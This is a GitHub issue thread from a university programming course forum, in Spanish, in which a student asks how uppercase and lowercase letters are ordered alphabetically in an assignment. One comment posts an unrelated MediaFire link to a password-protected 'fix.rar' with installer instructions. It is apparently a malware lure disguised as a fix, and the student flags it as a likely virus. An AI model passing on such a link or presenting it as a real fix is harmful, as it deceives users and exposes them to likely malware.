### ISSUE TITLE
duda orden alfabetico en detectar_plagas

### ISSUE THREAD

**Issue by ManoCarva** [IIC2233/Syllabus#208]
### Prerrequisitos
(Marcar colocando una `X` entre los corchetes los ítems que ya hiciste, así: `"[X]"`)

* [ X] Leí las reglas del foro (https://github.com/IIC2233/Syllabus/wiki/3.-Reglas-del-foro-(issues)).
* [ ]X Revisé el compilado de dudas de la tarea y no encontré una *issue* similar a la mía ([click aquí para ir al compilado](/IIC2233/Syllabus/issues/11)).
* [ X] Mi duda no se trata sobre una librería o *built-in*, ya que eso se pregunta en la *issue* creada para ello ([click aquí para ir a esa _issue_](/IIC2233/Syllabus/issues/10)).
* [X ] De ser necesario, colocaré código simple que permita explicar mi problema o duda, ya que compartir código de esta evaluación puede ser considerado una falta a la ética.

### Duda

Disculpen pero estaba revisando como funcionaban algunas funciones y leo que algunas cuentan las mayúsculas alfabéticamente antes que las minúsculas. En el caso de "detectar_plagas", que se tiene que ordenar algunas veces alfabéticamente; ¿Se consideran las mayúsculas lo mismo que las minúsculas, antes de las minúsculas de la misma letra o antes que todas las minúsculas?

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ManoCarva** [comment]
también creo que el comentario que salió es un virus, ¿no? Me respondió apenas publiqué el issue ¿podrían eliminarlo?
